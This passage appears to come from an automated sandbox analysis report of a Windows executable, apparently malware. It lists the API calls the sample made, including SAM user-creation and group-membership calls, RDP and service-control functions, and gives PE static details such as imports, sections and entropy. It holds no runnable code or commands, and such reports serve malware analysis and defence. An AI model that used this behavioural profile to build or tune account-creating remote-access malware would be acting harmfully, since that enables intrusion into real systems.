1749. "gdi32.dll.CreateCompatibleBitmap",
1750. "gdi32.dll.SetBitmapBits",
1751. "gdi32.dll.DeleteDC",
1752. "gdi32.dll.GdiValidateHandle",
1753. "gdi32.dll.GdiDllInitialize",
1754. "gdi32.dll.GdiProcessSetup",
1755. "gdi32.dll.GetStockObject",
1756. "gdi32.dll.CreateSolidBrush",
1757. "gdi32.dll.CreateCompatibleDC",
1758. "gdi32.dll.GdiConvertBitmapV5",
1759. "gdi32.dll.GdiCreateLocalEnhMetaFile",
1760. "gdi32.dll.GdiCreateLocalMetaFilePict",
1761. "gdi32.dll.GetRgnBox",
1762. "gdi32.dll.CombineRgn",
1763. "gdi32.dll.OffsetRgn",
1764. "gdi32.dll.MirrorRgn",
1765. "gdi32.dll.EnableEUDC",
1766. "gdi32.dll.GdiConvertToDevmodeW",
1767. "gdi32.dll.GetTextExtentPointA",
1768. "gdi32.dll.GetTextExtentPointW",
1769. "gdi32.dll.CreateBitmap",
1770. "gdi32.dll.SetTextAlign",
1771. "gdi32.dll.GetTextAlign",
1772. "gdi32.dll.IntersectClipRect",
1773. "gdi32.dll.SelectObject",
1774. "gdi32.dll.SetBkMode",
1775. "gdi32.dll.GetBkColor",
1776. "gdi32.dll.GetObjectW",
1777. "gdi32.dll.SetTextColor",
1778. "gdi32.dll.SetBkColor",
1779. "gdi32.dll.GetLayout",
1780. "gdi32.dll.StretchDIBits",
1781. "gdi32.dll.GetDeviceCaps",
1782. "gdi32.dll.GetDIBColorTable",
1783. "gdi32.dll.GdiGetBitmapBitsSize",
1784. "gdi32.dll.DeleteObject",
1785. "gdi32.dll.DeleteMetaFile",
1786. "gdi32.dll.DeleteEnhMetaFile",
1787. "gdi32.dll.GdiConvertMetaFilePict",
1788. "gdi32.dll.GdiConvertEnhMetaFile",
1789. "gdi32.dll.GdiReleaseDC",
1790. "gdi32.dll.StretchBlt",
1791. "gdi32.dll.GetObjectType",
1792. "gdi32.dll.GdiConvertAndCheckDC",
1793. "gdi32.dll.SetRectRgn",
1794. "gdi32.dll.BitBlt",
1795. "gdi32.dll.TextOutW",
1796. "gdi32.dll.TextOutA",
1797. "gdi32.dll.PatBlt",
1798. "gdi32.dll.SetLayoutWidth",
1799. "kernel32.dll.GetLocaleInfoW",
1800. "kernel32.dll.SetUnhandledExceptionFilter",
1801. "kernel32.dll.UnhandledExceptionFilter",
1802. "kernel32.dll.GetSystemTimeAsFileTime",
1803. "kernel32.dll.LoadLibraryExA",
1804. "kernel32.dll.InterlockedCompareExchange",
1805. "kernel32.dll.DelayLoadFailureHook",
1806. "kernel32.dll.GlobalAddAtomA",
1807. "kernel32.dll.GlobalFindAtomA",
1808. "kernel32.dll.QueryPerformanceFrequency",
1809. "kernel32.dll.QueryPerformanceCounter",
1810. "kernel32.dll.LCMapStringW",
1811. "kernel32.dll.CreateFileMappingW",
1812. "kernel32.dll.MapViewOfFile",
1813. "kernel32.dll.WerpNotifyLoadStringResource",
1814. "kernel32.dll.GetSystemDefaultLangID",
1815. "kernel32.dll.RegQueryInfoKeyW",
1816. "kernel32.dll.RegEnumValueW",
1817. "kernel32.dll.RegOpenKeyExW",
1818. "kernel32.dll.RegQueryValueExW",
1819. "kernel32.dll.IsDBCSLeadByte",
1820. "kernel32.dll.WerpNotifyUseStringResource",
1821. "kernel32.dll.ProcessIdToSessionId",
1822. "kernel32.dll.MulDiv",
1823. "kernel32.dll.GetThreadLocale",
1824. "kernel32.dll.ConvertDefaultLocale",
1825. "kernel32.dll.IsValidLocale",
1826. "kernel32.dll.GetAtomNameW",
1827. "kernel32.dll.GetAtomNameA",
1828. "kernel32.dll.AddAtomW",
1829. "kernel32.dll.AddAtomA",
1830. "kernel32.dll.EnumResourceNamesExW",
1831. "kernel32.dll.SetFileTime",
1832. "kernel32.dll.CompareStringW",
1833. "kernel32.dll.GetCPInfo",
1834. "kernel32.dll.GetStringTypeA",
1835. "kernel32.dll.GetStringTypeW",
1836. "kernel32.dll.FoldStringW",
1837. "kernel32.dll.GlobalHandle",
1838. "kernel32.dll.GetExitCodeThread",
1839. "kernel32.dll.ExitThread",
1840. "kernel32.dll.GetCurrentThread",
1841. "kernel32.dll.GlobalAddAtomW",
1842. "kernel32.dll.SearchPathW",
1843. "kernel32.dll.IsDBCSLeadByteEx",
1844. "kernel32.dll.DisableThreadLibraryCalls",
1845. "kernel32.dll.FindResourceExA",
1846. "kernel32.dll.FindResourceExW",
1847. "kernel32.dll.LoadStringBaseExW",
1848. "kernel32.dll.RegisterWaitForInputIdle",
1849. "kernel32.dll.QueryActCtxSettingsW",
1850. "kernel32.dll.LoadAppInitDlls",
1851. "kernel32.dll.LocalSize",
1852. "kernel32.dll.LocalUnlock",
1853. "kernel32.dll.LocalLock",
1854. "kernel32.dll.LocalReAlloc",
1855. "kernel32.dll.InterlockedIncrement",
1856. "kernel32.dll.RegSetValueExW",
1857. "kernel32.dll.RegCloseKey",
1858. "kernel32.dll.RegCreateKeyExW",
1859. "kernel32.dll.RegDeleteKeyExW",
1860. "kernel32.dll.GetUserDefaultLCID",
1861. "kernel32.dll.GlobalUnlock",
1862. "kernel32.dll.GlobalLock",
1863. "kernel32.dll.GlobalSize",
1864. "kernel32.dll.GlobalDeleteAtom",
1865. "kernel32.dll.DeleteAtom",
1866. "kernel32.dll.InterlockedExchange",
1867. "kernel32.dll.GlobalGetAtomNameA",
1868. "kernel32.dll.GlobalGetAtomNameW",
1869. "kernel32.dll.GlobalFree",
1870. "kernel32.dll.InterlockedDecrement",
1871. "kernel32.dll.GlobalFlags",
1872. "kernel32.dll.GetOEMCP",
1873. "kernel32.dll.GlobalReAlloc",
1874. "kernel32.dll.WaitForMultipleObjectsEx",
1875. "kernel32.dll.lstrcmpiW",
1876. "kernel32.dll.WritePrivateProfileStringW",
1877. "kernel32.dll.GlobalFindAtomW",
1878. "urlmon.dll.CoInternetCreateSecurityManager",
1879. "urlmon.dll.CoInternetCreateZoneManager",
1880. "urlmon.dll.CoInternetIsFeatureEnabledForUrl",
1881. "samlib.dll.SamConnect",
1882. "rpcrt4.dll.RpcStringBindingComposeW",
1883. "rpcrt4.dll.RpcStringFreeW",
1884. "samlib.dll.SamEnumerateDomainsInSamServer",
1885. "samlib.dll.SamLookupDomainInSamServer",
1886. "samlib.dll.SamFreeMemory",
1887. "samlib.dll.SamOpenDomain",
1888. "samlib.dll.SamCreateUser2InDomain",
1889. "samlib.dll.SamQueryInformationUser",
1890. "samlib.dll.SamSetInformationUser",
1891. "cryptbase.dll.SystemFunction028",
1892. "rpcrt4.dll.NDRCContextBinding",
1893. "rpcrt4.dll.RpcBindingToStringBindingW",
1894. "rpcrt4.dll.I_RpcMapWin32Status",
1895. "rpcrt4.dll.RpcStringBindingParseW",
1896. "samlib.dll.SamCloseHandle",
1897. "sechost.dll.LookupAccountSidLocalW",
1898. "advapi32.dll.LsaOpenPolicy",
1899. "advapi32.dll.LsaLookupNames2",
1900. "advapi32.dll.LsaClose",
1901. "advapi32.dll.LsaFreeMemory",
1902. "samlib.dll.SamLookupNamesInDomain",
1903. "samlib.dll.SamOpenAlias",
1904. "samlib.dll.SamAddMemberToAlias",
1905. "linkinfo.dll.IsValidLinkInfo",
1906. "propsys.dll.#417",
1907. "propsys.dll.PSGetNameFromPropertyKey",
1908. "propsys.dll.PSStringFromPropertyKey",
1909. "propsys.dll.InitVariantFromBuffer",
1910. "propsys.dll.PropVariantToGUID",
1911. "advapi32.dll.GetSecurityInfo",
1912. "advapi32.dll.SetSecurityInfo",
1913. "advapi32.dll.GetSecurityDescriptorControl",
1914. "kernel32.dll.CopyFileExW",
1915. "kernel32.dll.IsDebuggerPresent",
1916. "kernel32.dll.SetConsoleInputExeNameW",
1917. "ole32.dll.CoInitializeSecurity",
1918. "sechost.dll.LookupAccountNameLocalW",
1919. "kernel32.dll.CreateEventExW",
1920. "kernel32.dll.CreateSemaphoreExW",
1921. "kernel32.dll.CreateThreadpoolTimer",
1922. "kernel32.dll.SetThreadpoolTimer",
1923. "kernel32.dll.WaitForThreadpoolTimerCallbacks",
1924. "kernel32.dll.CloseThreadpoolTimer",
1925. "kernel32.dll.CreateThreadpoolWait",
1926. "kernel32.dll.SetThreadpoolWait",
1927. "kernel32.dll.CloseThreadpoolWait",
1928. "kernel32.dll.FreeLibraryWhenCallbackReturns",
1929. "kernel32.dll.GetCurrentProcessorNumber",
1930. "kernel32.dll.GetLogicalProcessorInformation",
1931. "kernel32.dll.CreateSymbolicLinkW",
1932. "kernel32.dll.EnumSystemLocalesEx",
1933. "kernel32.dll.CompareStringEx",
1934. "kernel32.dll.GetDateFormatEx",
1935. "kernel32.dll.GetLocaleInfoEx",
1936. "kernel32.dll.GetTimeFormatEx",
1937. "kernel32.dll.IsValidLocaleName",
1938. "kernel32.dll.GetTickCount64",
1939. "sqlmap.dll.ServiceMain",
1940. "sqlmap.dll.SvchostPushServiceGlobals",
1941. "termsrv.dll.ServiceMain",
1942. "termsrv.dll.SvchostPushServiceGlobals",
1943. "ole32.dll.CoFreeUnusedLibrariesEx",
1944. "ole32.dll.CoRegisterClassObject",
1945. "rpcrtremote.dll.I_RpcExtInitializeExtensionPoint",
1946. "ole32.dll.CoGetClassObject",
1947. "ole32.dll.CoGetMarshalSizeMax",
1948. "ole32.dll.CoMarshalInterface",
1949. "ole32.dll.CoUnmarshalInterface",
1950. "ole32.dll.StringFromIID",
1951. "ole32.dll.CoGetPSClsid",
1952. "ole32.dll.CoReleaseMarshalData",
1953. "ole32.dll.DcomChannelSetHResult",
1954. "ole32.dll.CoImpersonateClient",
1955. "advapi32.dll.OpenThreadToken",
1956. "ole32.dll.CoRevertToSelf",
1957. "advapi32.dll.QueryTraceW",
1958. "lsmproxy.dll.DllGetClassObject",
1959. "lsmproxy.dll.DllCanUnloadNow",
1960. "regapi.dll.RegGetMachinePolicyEx",
1961. "secur32.dll.InitSecurityInterfaceW",
1962. "cryptsp.dll.SystemFunction035",
1963. "user32.dll.LoadStringW",
1964. "ole32.dll.CLSIDFromString",
1965. "regapi.dll.RegQueryListenerStart",
1966. "rdpwsx.dll.WsxInitialize",
1967. "rdpwsx.dll.WsxDestroy",
1968. "rdpwsx.dll.WsxConnect",
1969. "rdpwsx.dll.WsxDisconnect",
1970. "rdpwsx.dll.WsxInitializeClientData",
1971. "rdpwsx.dll.WsxConvertPublishedApp",
1972. "rdpwsx.dll.WsxWinStationInitialize",
1973. "rdpwsx.dll.WsxWinStationRundown",
1974. "rdpwsx.dll.WsxVirtualChannelSecurity",
1975. "rdpwsx.dll.WsxIcaStackIoControl",
1976. "rdpwsx.dll.WsxBrokenConnection",
1977. "rdpwsx.dll.WsxLogonNotify",
1978. "rdpwsx.dll.WsxSetErrorInfo",
1979. "rdpwsx.dll.WsxSendAutoReconnectStatus",
1980. "rdpwsx.dll.WsxEscape",
1981. "rdpwsx.dll.WsxOpenVirtualChannel",
1982. "rdpwsx.dll.WsxCanLogonProceed",
1983. "rdpwsx.dll.WsxGetConnectionProperty",
1984. "rdpwsx.dll.WsxAutomationVerification",
1985. "rdpwsx.dll.WsxVerify",
1986. "rdpwsx.dll.WsxExchangeStackConfig",
1987. "rdpwsx.dll.WsxQueryGatewayPolicies",
1988. "sechost.dll.OpenSCManagerW",
1989. "sechost.dll.OpenServiceW",
1990. "sechost.dll.StartServiceW",
1991. "sechost.dll.CloseServiceHandle",
1992. "crypt32.dll.CryptProtectData",
1993. "cryptbase.dll.SystemFunction040",
1994. "rpcrt4.dll.NdrClientCall3",
1995. "sechost.dll.ControlService",
1996. "umrdp.dll.ServiceMain",
1997. "umrdp.dll.SvchostPushServiceGlobals",
1998. "sechost.dll.RegisterServiceCtrlHandlerExW",
1999. "sechost.dll.SetServiceStatus",
2000. "sechost.dll.QueryServiceStatus",
2001. "setupapi.dll.SetupDiGetClassDevsW",
2002. "setupapi.dll.SetupDiEnumDeviceInterfaces",
2003. "setupapi.dll.SetupDiEnumDeviceInfo",
2004. "setupapi.dll.SetupDiGetDeviceRegistryPropertyW",
2005. "setupapi.dll.SetupDiGetDeviceInterfaceDetailW",
2006. "setupapi.dll.SetupDiDestroyDeviceInfoList",
2007. "ole32.dll.CLSIDFromProgID",
2008. "rpcrt4.dll.RpcServerUseProtseqEpW",
2009. "rpcrt4.dll.RpcServerRegisterIfEx",
2010. "rpcrt4.dll.RpcServerListen",
2011. "rpcrt4.dll.RpcServerUnregisterIfEx",
2012. "setupapi.dll.SetupDiOpenDevRegKey",
2013. "rpcrt4.dll.RpcServerUnregisterIf"
2014. ]
2015.  
2016. [*] Static Analysis: {
2017. "pe": {
2018. "peid_signatures": null,
2019. "imports": [
2020. {
2021. "imports": [
2022. {
2023. "name": "FlushFileBuffers",
2024. "address": "0x43603c"
2025. },
2026. {
2027. "name": "GetConsoleCP",
2028. "address": "0x436040"
2029. },
2030. {
2031. "name": "GetConsoleMode",
2032. "address": "0x436044"
2033. },
2034. {
2035. "name": "HeapSize",
2036. "address": "0x436048"
2037. },
2038. {
2039. "name": "HeapReAlloc",
2040. "address": "0x43604c"
2041. },
2042. {
2043. "name": "GetProcessHeap",
2044. "address": "0x436050"
2045. },
2046. {
2047. "name": "SetFilePointerEx",
2048. "address": "0x436054"
2049. },
2050. {
2051. "name": "WriteConsoleW",
2052. "address": "0x436058"
2053. },
2054. {
2055. "name": "GetStringTypeW",
2056. "address": "0x43605c"
2057. },
2058. {
2059. "name": "SetStdHandle",
2060. "address": "0x436060"
2061. },
2062. {
2063. "name": "CreateFileW",
2064. "address": "0x436064"
2065. },
2066. {
2067. "name": "AllocConsole",
2068. "address": "0x436068"
2069. },
2070. {
2071. "name": "GetGeoInfoA",
2072. "address": "0x43606c"
2073. },
2074. {
2075. "name": "K32EnumPageFilesW",
2076. "address": "0x436070"
2077. },
2078. {
2079. "name": "DefineDosDeviceW",
2080. "address": "0x436074"
2081. },
2082. {
2083. "name": "Sleep",
2084. "address": "0x436078"
2085. },
2086. {
2087. "name": "FreeEnvironmentStringsW",
2088. "address": "0x43607c"
2089. },
2090. {
2091. "name": "GetEnvironmentStringsW",
2092. "address": "0x436080"
2093. },
2094. {
2095. "name": "GetCommandLineW",
2096. "address": "0x436084"
2097. },
2098. {
2099. "name": "GetCommandLineA",
2100. "address": "0x436088"
2101. },
2102. {
2103. "name": "GetCPInfo",
2104. "address": "0x43608c"
2105. },
2106. {
2107. "name": "GetOEMCP",
2108. "address": "0x436090"
2109. },
2110. {
2111. "name": "IsValidCodePage",
2112. "address": "0x436094"
2113. },
2114. {
2115. "name": "FindNextFileA",
2116. "address": "0x436098"
2117. },
2118. {
2119. "name": "VirtualProtect",
2120. "address": "0x43609c"
2121. },
2122. {
2123. "name": "VirtualAlloc",
2124. "address": "0x4360a0"
2125. },
2126. {
2127. "name": "FindFirstFileExA",
2128. "address": "0x4360a4"
2129. },
2130. {
2131. "name": "FindClose",
2132. "address": "0x4360a8"
2133. },
2134. {
2135. "name": "CloseHandle",
2136. "address": "0x4360ac"
2137. },
2138. {
2139. "name": "GetFileType",
2140. "address": "0x4360b0"
2141. },
2142. {
2143. "name": "LCMapStringW",
2144. "address": "0x4360b4"
2145. },
2146. {
2147. "name": "HeapFree",
2148. "address": "0x4360b8"
2149. },
2150. {
2151. "name": "HeapAlloc",
2152. "address": "0x4360bc"
2153. },
2154. {
2155. "name": "GetACP",
2156. "address": "0x4360c0"
2157. },
2158. {
2159. "name": "GetModuleHandleExW",
2160. "address": "0x4360c4"
2161. },
2162. {
2163. "name": "ExitProcess",
2164. "address": "0x4360c8"
2165. },
2166. {
2167. "name": "WideCharToMultiByte",
2168. "address": "0x4360cc"
2169. },
2170. {
2171. "name": "MultiByteToWideChar",
2172. "address": "0x4360d0"
2173. },
2174. {
2175. "name": "GetModuleFileNameA",
2176. "address": "0x4360d4"
2177. },
2178. {
2179. "name": "WriteFile",
2180. "address": "0x4360d8"
2181. },
2182. {
2183. "name": "GetStdHandle",
2184. "address": "0x4360dc"
2185. },
2186. {
2187. "name": "RaiseException",
2188. "address": "0x4360e0"
2189. },
2190. {
2191. "name": "LoadLibraryExW",
2192. "address": "0x4360e4"
2193. },
2194. {
2195. "name": "GetProcAddress",
2196. "address": "0x4360e8"
2197. },
2198. {
2199. "name": "FreeLibrary",
2200. "address": "0x4360ec"
2201. },
2202. {
2203. "name": "TlsFree",
2204. "address": "0x4360f0"
2205. },
2206. {
2207. "name": "TlsSetValue",
2208. "address": "0x4360f4"
2209. },
2210. {
2211. "name": "TlsGetValue",
2212. "address": "0x4360f8"
2213. },
2214. {
2215. "name": "TlsAlloc",
2216. "address": "0x4360fc"
2217. },
2218. {
2219. "name": "InitializeCriticalSectionAndSpinCount",
2220. "address": "0x436100"
2221. },
2222. {
2223. "name": "DeleteCriticalSection",
2224. "address": "0x436104"
2225. },
2226. {
2227. "name": "DecodePointer",
2228. "address": "0x436108"
2229. },
2230. {
2231. "name": "UnhandledExceptionFilter",
2232. "address": "0x43610c"
2233. },
2234. {
2235. "name": "SetUnhandledExceptionFilter",
2236. "address": "0x436110"
2237. },
2238. {
2239. "name": "GetCurrentProcess",
2240. "address": "0x436114"
2241. },
2242. {
2243. "name": "TerminateProcess",
2244. "address": "0x436118"
2245. },
2246. {
2247. "name": "IsProcessorFeaturePresent",
2248. "address": "0x43611c"
2249. },
2250. {
2251. "name": "QueryPerformanceCounter",
2252. "address": "0x436120"
2253. },
2254. {
2255. "name": "GetCurrentProcessId",
2256. "address": "0x436124"
2257. },
2258. {
2259. "name": "GetCurrentThreadId",
2260. "address": "0x436128"
2261. },
2262. {
2263. "name": "GetSystemTimeAsFileTime",
2264. "address": "0x43612c"
2265. },
2266. {
2267. "name": "InitializeSListHead",
2268. "address": "0x436130"
2269. },
2270. {
2271. "name": "IsDebuggerPresent",
2272. "address": "0x436134"
2273. },
2274. {
2275. "name": "GetStartupInfoW",
2276. "address": "0x436138"
2277. },
2278. {
2279. "name": "GetModuleHandleW",
2280. "address": "0x43613c"
2281. },
2282. {
2283. "name": "RtlUnwind",
2284. "address": "0x436140"
2285. },
2286. {
2287. "name": "GetLastError",
2288. "address": "0x436144"
2289. },
2290. {
2291. "name": "SetLastError",
2292. "address": "0x436148"
2293. },
2294. {
2295. "name": "EnterCriticalSection",
2296. "address": "0x43614c"
2297. },
2298. {
2299. "name": "LeaveCriticalSection",
2300. "address": "0x436150"
2301. }
2302. ],
2303. "dll": "KERNEL32.dll"
2304. },
2305. {
2306. "imports": [
2307. {
2308. "name": "FindWindowW",
2309. "address": "0x4361b4"
2310. },
2311. {
2312. "name": "GetTouchInputInfo",
2313. "address": "0x4361b8"
2314. },
2315. {
2316. "name": "DdeCmpStringHandles",
2317. "address": "0x4361bc"
2318. },
2319. {
2320. "name": "MessageBoxA",
2321. "address": "0x4361c0"
2322. }
2323. ],
2324. "dll": "USER32.dll"
2325. },
2326. {
2327. "imports": [
2328. {
2329. "name": null,
2330. "address": "0x4361e4"
2331. }
2332. ],
2333. "dll": "WINSPOOL.DRV"
2334. },
2335. {
2336. "imports": [
2337. {
2338. "name": "DuplicateToken",
2339. "address": "0x436000"
2340. },
2341. {
2342. "name": "ObjectPrivilegeAuditAlarmA",
2343. "address": "0x436004"
2344. },
2345. {
2346. "name": "PerfDecrementULongCounterValue",
2347. "address": "0x436008"
2348. },
2349. {
2350. "name": "CredUnmarshalCredentialA",
2351. "address": "0x43600c"
2352. }
2353. ],
2354. "dll": "ADVAPI32.dll"
2355. },
2356. {
2357. "imports": [
2358. {
2359. "name": "VarBstrFromDate",
2360. "address": "0x436170"
2361. }
2362. ],
2363. "dll": "OLEAUT32.dll"
2364. },
2365. {
2366. "imports": [
2367. {
2368. "name": "AVIStreamRelease",
2369. "address": "0x436014"
2370. }
2371. ],
2372. "dll": "AVIFIL32.dll"
2373. },
2374. {
2375. "imports": [
2376. {
2377. "name": "DeregisterManageableLogClient",
2378. "address": "0x4361f8"
2379. }
2380. ],
2381. "dll": "clfsw32.dll"
2382. },
2383. {
2384. "imports": [
2385. {
2386. "name": "ClusterNodeGetEnumCount",
2387. "address": "0x43601c"
2388. }
2389. ],
2390. "dll": "CLUSAPI.dll"
2391. },
2392. {
2393. "imports": [
2394. {
2395. "name": "ImageList_AddMasked",
2396. "address": "0x436024"
2397. }
2398. ],
2399. "dll": "COMCTL32.dll"
2400. },
2401. {
2402. "imports": [
2403. {
2404. "name": "UnDecorateSymbolNameW",
2405. "address": "0x436200"
2406. }
2407. ],
2408. "dll": "dbghelp.dll"
2409. },
2410. {
2411. "imports": [
2412. {
2413. "name": "DnsDhcpRegisterHostAddrs",
2414. "address": "0x43602c"
2415. }
2416. ],
2417. "dll": "DNSAPI.dll"
2418. },
2419. {
2420. "imports": [
2421. {
2422. "name": null,
2423. "address": "0x436208"
2424. }
2425. ],
2426. "dll": "dsuiext.dll"
2427. },
2428. {
2429. "imports": [
2430. {
2431. "name": "GetMonitorContrast",
2432. "address": "0x436210"
2433. }
2434. ],
2435. "dll": "dxva2.dll"
2436. },
2437. {
2438. "imports": [
2439. {
2440. "name": null,
2441. "address": "0x436218"
2442. },
2443. {
2444. "name": "GdipDisposeImageAttributes",
2445. "address": "0x43621c"
2446. },
2447. {
2448. "name": "GdipGetImageFlags",
2449. "address": "0x436220"
2450. },
2451. {
2452. "name": "GdipSetPathGradientPresetBlend",
2453. "address": "0x436224"
2454. }
2455. ],
2456. "dll": "gdiplus.dll"
2457. },
2458. {
2459. "imports": [
2460. {
2461. "name": "NotifyAddrChange",
2462. "address": "0x436034"
2463. }
2464. ],
2465. "dll": "IPHLPAPI.DLL"
2466. },
2467. {
2468. "imports": [
2469. {
2470. "name": null,
2471. "address": "0x436158"
2472. }
2473. ],
2474. "dll": "MAPI32.dll"
2475. },
2476. {
2477. "imports": [
2478. {
2479. "name": "MprAdminInterfaceGetCredentials",
2480. "address": "0x436160"
2481. }
2482. ],
2483. "dll": "MPRAPI.dll"
2484. },
2485. {
2486. "imports": [
2487. {
2488. "name": "DRMGetEnvironmentInfo",
2489. "address": "0x43622c"
2490. }
2491. ],
2492. "dll": "msdrm.dll"
2493. },
2494. {
2495. "imports": [
2496. {
2497. "name": "ICInfo",
2498. "address": "0x436168"
2499. }
2500. ],
2501. "dll": "MSVFW32.dll"
2502. },
2503. {
2504. "imports": [
2505. {
2506. "name": "glColor4sv",
2507. "address": "0x436178"
2508. }
2509. ],
2510. "dll": "OPENGL32.dll"
2511. },
2512. {
2513. "imports": [
2514. {
2515. "name": "VariantToUInt32",
2516. "address": "0x436180"
2517. }
2518. ],
2519. "dll": "PROPSYS.dll"
2520. },
2521. {
2522. "imports": [
2523. {
2524. "name": "ResUtilSetResourceServiceEnvironment",
2525. "address": "0x436188"
2526. }
2527. ],
2528. "dll": "RESUTILS.dll"
2529. },
2530. {
2531. "imports": [
2532. {
2533. "name": "RpcServerListen",
2534. "address": "0x436190"
2535. },
2536. {
2537. "name": "NdrConformantStringMemorySize",
2538. "address": "0x436194"
2539. }
2540. ],
2541. "dll": "RPCRT4.dll"
2542. },
2543. {
2544. "imports": [
2545. {
2546. "name": "MgmDeleteGroupMembershipEntry",
2547. "address": "0x436234"
2548. }
2549. ],
2550. "dll": "rtm.dll"
2551. },
2552. {
2553. "imports": [
2554. {
2555. "name": "CM_Add_Range",
2556. "address": "0x43619c"
2557. }
2558. ],
2559. "dll": "SETUPAPI.dll"
2560. },
2561. {
2562. "imports": [
2563. {
2564. "name": "DllRegisterWindowClasses",
2565. "address": "0x4361a4"
2566. }
2567. ],
2568. "dll": "SHDOCVW.dll"
2569. },
2570. {
2571. "imports": [
2572. {
2573. "name": "lineGetAddressCaps",
2574. "address": "0x4361ac"
2575. }
2576. ],
2577. "dll": "TAPI32.dll"
2578. },
2579. {
2580. "imports": [
2581. {
2582. "name": "WsCreateMessageForChannel",
2583. "address": "0x43623c"
2584. }
2585. ],
2586. "dll": "webservices.dll"
2587. },
2588. {
2589. "imports": [
2590. {
2591. "name": "WinBioControlUnit",
2592. "address": "0x436244"
2593. }
2594. ],
2595. "dll": "winbio.dll"
2596. },
2597. {
2598. "imports": [
2599. {
2600. "name": "IWICMetadataQueryReader_GetLocation_Proxy",
2601. "address": "0x4361ec"
2602. },
2603. {
2604. "name": "IWICImagingFactory_CreateFastMetadataEncoderFromDecoder_Proxy",
2605. "address": "0x4361f0"
2606. }
2607. ],
2608. "dll": "WindowsCodecs.dll"
2609. },
2610. {
2611. "imports": [
2612. {
2613. "name": "WinHttpQueryOption",
2614. "address": "0x4361c8"
2615. }
2616. ],
2617. "dll": "WINHTTP.dll"
2618. },
2619. {
2620. "imports": [
2621. {
2622. "name": "FindNextUrlCacheContainerW",
2623. "address": "0x4361d0"
2624. },
2625. {
2626. "name": "InternetCheckConnectionA",
2627. "address": "0x4361d4"
2628. }
2629. ],
2630. "dll": "WININET.dll"
2631. },
2632. {
2633. "imports": [
2634. {
2635. "name": "waveOutGetErrorTextW",
2636. "address": "0x4361dc"
2637. }
2638. ],
2639. "dll": "WINMM.dll"
2640. },
2641. {
2642. "imports": [
2643. {
2644. "name": null,
2645. "address": "0x43624c"
2646. }
2647. ],
2648. "dll": "wsnmp32.dll"
2649. }
2650. ],
2651. "digital_signers": null,
2652. "exported_dll_name": null,
2653. "actual_checksum": "0x000a0d78",
2654. "overlay": null,
2655. "imagebase": "0x00400000",
2656. "reported_checksum": "0x00000000",
2657. "icon_hash": null,
2658. "entrypoint": "0x0042685e",
2659. "timestamp": "2019-06-23 22:20:50",
2660. "osversion": "5.1",
2661. "sections": [
2662. {
2663. "name": ".text",
2664. "characteristics": "IMAGE_SCN_CNT_CODE|IMAGE_SCN_MEM_EXECUTE|IMAGE_SCN_MEM_READ",
2665. "virtual_address": "0x00001000",
2666. "size_of_data": "0x00034800",
2667. "entropy": "6.32",
2668. "raw_address": "0x00000400",
2669. "virtual_size": "0x0003461b",
2670. "characteristics_raw": "0x60000020"
2671. },
2672. {
2673. "name": ".rdata",
2674. "characteristics": "IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_READ",
2675. "virtual_address": "0x00036000",
2676. "size_of_data": "0x00008c00",
2677. "entropy": "5.45",
2678. "raw_address": "0x00034c00",
2679. "virtual_size": "0x00008bd6",
2680. "characteristics_raw": "0x40000040"
2681. },
2682. {
2683. "name": ".data",
2684. "characteristics": "IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_READ|IMAGE_SCN_MEM_WRITE",
2685. "virtual_address": "0x0003f000",
2686. "size_of_data": "0x0004ee00",
2687. "entropy": "6.08",
2688. "raw_address": "0x0003d800",
2689. "virtual_size": "0x0005045c",
2690. "characteristics_raw": "0xc0000040"
2691. },
2692. {
2693. "name": ".rsrc",
2694. "characteristics": "IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_READ",
2695. "virtual_address": "0x00090000",
2696. "size_of_data": "0x00000600",
2697. "entropy": "4.70",
2698. "raw_address": "0x0008c600",
2699. "virtual_size": "0x00000488",
2700. "characteristics_raw": "0x40000040"
2701. },
2702. {
2703. "name": ".reloc",
2704. "characteristics": "IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_DISCARDABLE|IMAGE_SCN_MEM_READ",
2705. "virtual_address": "0x00091000",
2706. "size_of_data": "0x00007a00",
2707. "entropy": "6.45",
2708. "raw_address": "0x0008cc00",
2709. "virtual_size": "0x0000799c",
2710. "characteristics_raw": "0x42000040"
2711. }
2712. ],
2713. "resources": [],
2714. "dirents": [
2715. {
2716. "virtual_address": "0x00000000",
2717. "name": "IMAGE_DIRECTORY_ENTRY_EXPORT",
2718. "size": "0x00000000"
2719. },
2720. {
2721. "virtual_address": "0x0003dc34",
2722. "name": "IMAGE_DIRECTORY_ENTRY_IMPORT",
2723. "size": "0x000002bc"
2724. },
2725. {
2726. "virtual_address": "0x00090000",
2727. "name": "IMAGE_DIRECTORY_ENTRY_RESOURCE",
2728. "size": "0x00000488"
2729. },
2730. {
2731. "virtual_address": "0x00000000",
2732. "name": "IMAGE_DIRECTORY_ENTRY_EXCEPTION",
2733. "size": "0x00000000"
2734. },
2735. {
2736. "virtual_address": "0x00000000",
2737. "name": "IMAGE_DIRECTORY_ENTRY_SECURITY",
2738. "size": "0x00000000"
2739. },
2740. {
2741. "virtual_address": "0x00091000",
2742. "name": "IMAGE_DIRECTORY_ENTRY_BASERELOC",
2743. "size": "0x0000799c"
2744. },
2745. {
2746. "virtual_address": "0x0003d520",
2747. "name": "IMAGE_DIRECTORY_ENTRY_DEBUG",
2748. "size": "0x0000001c"
2749. },
2750. {
2751. "virtual_address": "0x00000000",
2752. "name": "IMAGE_DIRECTORY_ENTRY_COPYRIGHT",
2753. "size": "0x00000000"
2754. },
2755. {
2756. "virtual_address": "0x00000000",
2757. "name": "IMAGE_DIRECTORY_ENTRY_GLOBALPTR",
2758. "size": "0x00000000"
2759. },
2760. {
2761. "virtual_address": "0x00000000",
2762. "name": "IMAGE_DIRECTORY_ENTRY_TLS",
2763. "size": "0x00000000"
2764. },
2765. {
2766. "virtual_address": "0x0003d540",
2767. "name": "IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG",
2768. "size": "0x00000040"
2769. },
2770. {
2771. "virtual_address": "0x00000000",
2772. "name": "IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT",
2773. "size": "0x00000000"
2774. },
2775. {
2776. "virtual_address": "0x00036000",
2777. "name": "IMAGE_DIRECTORY_ENTRY_IAT",
2778. "size": "0x00000254"
2779. },
2780. {
2781. "virtual_address": "0x00000000",
2782. "name": "IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT",
2783. "size": "0x00000000"
2784. },
2785. {
